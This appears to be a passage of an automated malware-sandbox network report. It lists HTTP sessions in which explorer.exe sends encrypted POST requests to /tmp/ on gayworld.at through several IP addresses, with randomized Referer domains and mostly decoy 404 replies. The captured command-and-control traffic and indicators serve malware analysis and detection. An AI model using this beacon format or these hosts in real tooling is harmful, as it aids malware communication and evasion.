                  HTTP Packets

                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  0192.168.2.54971187.250.250.50443C:\Windows\explorer.exe
                  TimestampkBytes transferredDirectionData


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  1192.168.2.5497305.135.247.111443C:\Windows\explorer.exe
                  TimestampkBytes transferredDirectionData


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  10192.168.2.549703123.213.233.19480C:\Windows\explorer.exe
                  TimestampkBytes transferredDirectionData
                  Oct 10, 2022 23:20:51.020308971 CEST120OUTPOST /tmp/ HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://hbrskgx.com/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 197
                  Host: gayworld.at
                  Oct 10, 2022 23:20:51.020308971 CEST120OUTData Raw: 3b 6e 51 13 f7 c3 6c 22 df a9 b3 77 73 70 09 cc 78 0a cb 97 6a 71 e3 6a 7d 7d 7b 92 32 c2 cf 6f 93 5d c0 2c 02 6b 2b 1c ea ec 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0d 6b 2c 90 f5 76 0b 75 6e 29 f1 88
                  Data Ascii: ;nQl"wspxjqj}}{2o],k+?*$`7C[zqNA -[k,vun)iCZB!4-?u.kmrUkK_\9HU*_AqLC0gwfKq!aR;x}U7l
                  Oct 10, 2022 23:20:51.911545992 CEST121INHTTP/1.0 404 Not Found
                  Date: Mon, 10 Oct 2022 21:20:51 GMT
                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                  X-Powered-By: PHP/5.6.40
                  Content-Length: 49
                  Connection: close
                  Content-Type: text/html; charset=utf-8
                  Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 2b 5a 39 08 a6 6a 5d b5 a9 12 a6 d0 b3 fc 6d 81 20 d1 fd 31 5d 07 83 9f 81 ca 2a d1 26 10
                  Data Ascii: #\+Z9j]m 1]*&


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  11192.168.2.549705185.95.186.5880C:\Windows\explorer.exe
                  TimestampkBytes transferredDirectionData
                  Oct 10, 2022 23:21:13.333100080 CEST122OUTPOST /tmp/ HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://ajrrmv.net/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 286
                  Host: gayworld.at
                  Oct 10, 2022 23:21:13.333100080 CEST122OUTData Raw: 3b 6e 51 13 f7 c3 6c 22 df a9 b3 77 73 70 09 cc 78 0a cb 97 6a 71 e3 6a 7d 7d 7b 92 32 c2 cf 6f 93 5d c0 2c 02 6b 2b 1c ea ec 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 02 6b 2c 90 f5 76 0b 75 2b 59 df f0
                  Data Ascii: ;nQl"wspxjqj}}{2o],k+?*$`7C[zqNA -[k,vu+Yv%t;t_Q0l`^V;v\3,oQ3&NE(DJ?4gG<nDF Q^'Xx)opI%G:9
                  Oct 10, 2022 23:21:13.709359884 CEST123INHTTP/1.0 404 Not Found
                  Date: Mon, 10 Oct 2022 21:21:13 GMT
                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                  X-Powered-By: PHP/5.6.40
                  Content-Length: 331
                  Connection: close
                  Content-Type: text/html; charset=utf-8
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  12192.168.2.549706123.213.233.19480C:\Windows\explorer.exe
                  TimestampkBytes transferredDirectionData
                  Oct 10, 2022 23:21:14.135349035 CEST124OUTPOST /tmp/ HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://ejnrvuf.net/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 355
                  Host: gayworld.at
                  Oct 10, 2022 23:21:14.135376930 CEST124OUTData Raw: 3b 6e 51 13 f7 c3 6c 22 df a9 b3 77 73 70 09 cc 78 0a cb 97 6a 71 e3 6a 7d 7d 7b 92 32 c2 cf 6f 93 5d c0 2c 02 6b 2b 1c ea ec 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 03 6b 2c 90 f5 76 0b 75 5f 3c f1 e1
                  Data Ascii: ;nQl"wspxjqj}}{2o],k+?*$`7C[zqNA -[k,vu_<u}Zg kL!Zn*I}JzuWsGR;Ci(Ih4Q<l~r]=E0"s JWjHz~{D$R.
                  Oct 10, 2022 23:21:15.289622068 CEST125INHTTP/1.0 404 Not Found
                  Date: Mon, 10 Oct 2022 21:21:14 GMT
                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                  X-Powered-By: PHP/5.6.40
                  Content-Length: 331
                  Connection: close
                  Content-Type: text/html; charset=utf-8
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  13192.168.2.549707123.213.233.19480C:\Windows\explorer.exe
                  TimestampkBytes transferredDirectionData
                  Oct 10, 2022 23:21:16.044111013 CEST126OUTPOST /tmp/ HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://edudewfeyy.org/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 347
                  Host: gayworld.at
                  Oct 10, 2022 23:21:16.044157028 CEST126OUTData Raw: 3b 6e 51 13 f7 c3 6c 22 df a9 b3 77 73 70 09 cc 78 0a cb 97 6a 71 e3 6a 7d 7d 7b 92 32 c2 cf 6f 93 5d c0 2c 02 6b 2b 1c ea ec 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 00 6b 2c 90 f5 76 0b 75 23 54 bb 80
                  Data Ascii: ;nQl"wspxjqj}}{2o],k+?*$`7C[zqNA -[k,vu#TbNWcN u)IILBb{ *:W)Pm`:UGy~FA6'\eHl4AG/6fqTP#G~AEd
                  Oct 10, 2022 23:21:17.202096939 CEST127INHTTP/1.0 404 Not Found
                  Date: Mon, 10 Oct 2022 21:21:16 GMT
                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                  X-Powered-By: PHP/5.6.40
                  Content-Length: 331
                  Connection: close
                  Content-Type: text/html; charset=utf-8
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  14192.168.2.549708123.213.233.19480C:\Windows\explorer.exe
                  TimestampkBytes transferredDirectionData
                  Oct 10, 2022 23:21:17.650942087 CEST128OUTPOST /tmp/ HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://yabmhcrfhk.com/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 282
                  Host: gayworld.at
                  Oct 10, 2022 23:21:17.651125908 CEST128OUTData Raw: 3b 6e 51 13 f7 c3 6c 22 df a9 b3 77 73 70 09 cc 78 0a cb 97 6a 71 e3 6a 7d 7d 7b 92 32 c2 cf 6f 93 5d c0 2c 02 6b 2b 1c ea ec 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 01 6b 2c 90 f5 76 0b 75 41 04 c0 e0
                  Data Ascii: ;nQl"wspxjqj}}{2o],k+?*$`7C[zqNA -[k,vuA?hanq-ISW6qr;NZN|/MS*[koE1GyK-vsR%"n#GCkI8VdFS
                  Oct 10, 2022 23:21:18.822432041 CEST129INHTTP/1.0 404 Not Found
                  Date: Mon, 10 Oct 2022 21:21:18 GMT
                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                  X-Powered-By: PHP/5.6.40
                  Content-Length: 331
                  Connection: close
                  Content-Type: text/html; charset=utf-8
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  15192.168.2.549709123.213.233.19480C:\Windows\explorer.exe
                  TimestampkBytes transferredDirectionData
                  Oct 10, 2022 23:21:19.131381035 CEST130OUTPOST /tmp/ HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://ksluvey.org/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 181
                  Host: gayworld.at
                  Oct 10, 2022 23:21:19.135519981 CEST130OUTData Raw: 3b 6e 51 13 f7 c3 6c 22 df a9 b3 77 73 70 09 cc 78 0a cb 97 6a 71 e3 6a 7d 7d 7b 92 32 c2 cf 6f 93 5d c0 2c 02 6b 2b 1c ea ec 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 06 6b 2c 90 f5 76 0b 75 5b 4a e7 a6
                  Data Ascii: ;nQl"wspxjqj}}{2o],k+?*$`7C[zqNA -[k,vu[JeBFNhubLVi&gZpJ\|7+`S'W0W/#FtcR=v_l
                  Oct 10, 2022 23:21:20.325900078 CEST131INHTTP/1.0 404 Not Found
                  Date: Mon, 10 Oct 2022 21:21:19 GMT
                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                  X-Powered-By: PHP/5.6.40
                  Content-Length: 331
                  Connection: close
                  Content-Type: text/html; charset=utf-8
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  16192.168.2.549710123.213.233.19480C:\Windows\explorer.exe
                  TimestampkBytes transferredDirectionData
                  Oct 10, 2022 23:21:20.622915030 CEST132OUTPOST /tmp/ HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://vkbntx.org/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 148
                  Host: gayworld.at
                  Oct 10, 2022 23:21:20.622915030 CEST132OUTData Raw: 3b 6e 51 13 f7 c3 6c 22 df a9 b3 77 73 70 09 cc 78 0a cb 97 6a 71 e3 6a 7d 7d 7b 92 32 c2 cf 6f 93 5d c0 2c 02 6b 2b 1c ea ec 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 07 6b 2c 90 f5 76 0b 75 6f 24 ed e4
                  Data Ascii: ;nQl"wspxjqj}}{2o],k+?*$`7C[zqNA -[k,vuo$a|0kmh0/F3J\#C0O`Xh
                  Oct 10, 2022 23:21:21.793978930 CEST132INHTTP/1.0 404 Not Found
                  Date: Mon, 10 Oct 2022 21:21:21 GMT
                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                  X-Powered-By: PHP/5.6.40
                  Content-Length: 51
                  Connection: close
                  Content-Type: text/html; charset=utf-8
                  Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 0f 63 55 ff 76 13 fa f6 43 f6 86 ac b8 37 db 2a 9a f9 10 0b 3c 96 a1 b6 e9 4f f8 6e 36 07 88
                  Data Ascii: #\6cUvC7*<On6


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  17192.168.2.549712123.213.233.19480C:\Windows\explorer.exe
                  TimestampkBytes transferredDirectionData
                  Oct 10, 2022 23:21:22.834033012 CEST154OUTPOST /tmp/ HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://qgfdim.com/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 311
                  Host: gayworld.at
                  Oct 10, 2022 23:21:22.834033012 CEST154OUTData Raw: 3b 6e 51 13 f7 c3 6c 22 df a9 b3 77 73 70 09 cc 78 0a cb 97 6a 71 e3 6a 7d 7d 7b 92 32 c2 cf 6f 93 5d c0 2c 02 6b 2b 1c ea ec 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 04 6b 2c 90 f5 76 0b 75 43 28 e5 a2
                  Data Ascii: ;nQl"wspxjqj}}{2o],k+?*$`7C[zqNA -[k,vuC(}9Sn\pSVN2n,]HElS5yJ^|-RK3#1BYTwp8;ORK9tSG9F)Qz
                  Oct 10, 2022 23:21:24.023444891 CEST155INHTTP/1.0 404 Not Found
                  Date: Mon, 10 Oct 2022 21:21:23 GMT
                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                  X-Powered-By: PHP/5.6.40
                  Content-Length: 331
                  Connection: close
                  Content-Type: text/html; charset=utf-8
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  18192.168.2.549713123.213.233.19480C:\Windows\explorer.exe
                  TimestampkBytes transferredDirectionData
                  Oct 10, 2022 23:21:24.328396082 CEST156OUTPOST /tmp/ HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://hepvmeebid.net/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 201
                  Host: gayworld.at
                  Oct 10, 2022 23:21:24.328737020 CEST156OUTData Raw: 3b 6e 51 13 f7 c3 6c 22 df a9 b3 77 73 70 09 cc 78 0a cb 97 6a 71 e3 6a 7d 7d 7b 92 32 c2 cf 6f 93 5d c0 2c 02 6b 2b 1c ea ec 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 05 6b 2c 90 f5 76 0b 75 3d 3c e4 f6
                  Data Ascii: ;nQl"wspxjqj}}{2o],k+?*$`7C[zqNA -[k,vu=<+kh0bwm~YZ^J8v7-=N^CMp6d\6 EYL#
                  Oct 10, 2022 23:21:25.508678913 CEST157INHTTP/1.1 200 OK
                  Date: Mon, 10 Oct 2022 21:21:24 GMT
                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                  X-Powered-By: PHP/5.6.40
                  Content-Length: 0
                  Connection: close
                  Content-Type: text/html; charset=utf-8


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  19192.168.2.549714211.171.233.12980C:\Windows\explorer.exe
                  TimestampkBytes transferredDirectionData
                  Oct 10, 2022 23:21:26.167962074 CEST158OUTPOST /tmp/ HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://biqudpj.net/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 220
                  Host: gayworld.at
                  Oct 10, 2022 23:21:26.167962074 CEST158OUTData Raw: 3b 6e 51 13 f7 c3 6c 22 df a9 b3 77 73 70 09 cc 78 0a cb 97 6a 71 e3 6a 7d 7d 7b 92 32 c2 cf 6f 93 5d c0 2c 02 6b 2b 1c ea ec 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1a 6b 2c 90 f5 76 0b 75 49 5a dc f8
                  Data Ascii: ;nQl"wspxjqj}}{2o],k+?*$`7C[zqNA -[k,vuIZ&^T@ `vaZ=?|J(_7.KaYKC+RZ=DzWf<0GM_(
                  Oct 10, 2022 23:21:27.166604996 CEST159INHTTP/1.0 404 Not Found
                  Date: Mon, 10 Oct 2022 21:21:26 GMT
                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                  X-Powered-By: PHP/5.6.40
                  Content-Length: 331
                  Connection: close
                  Content-Type: text/html; charset=utf-8
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


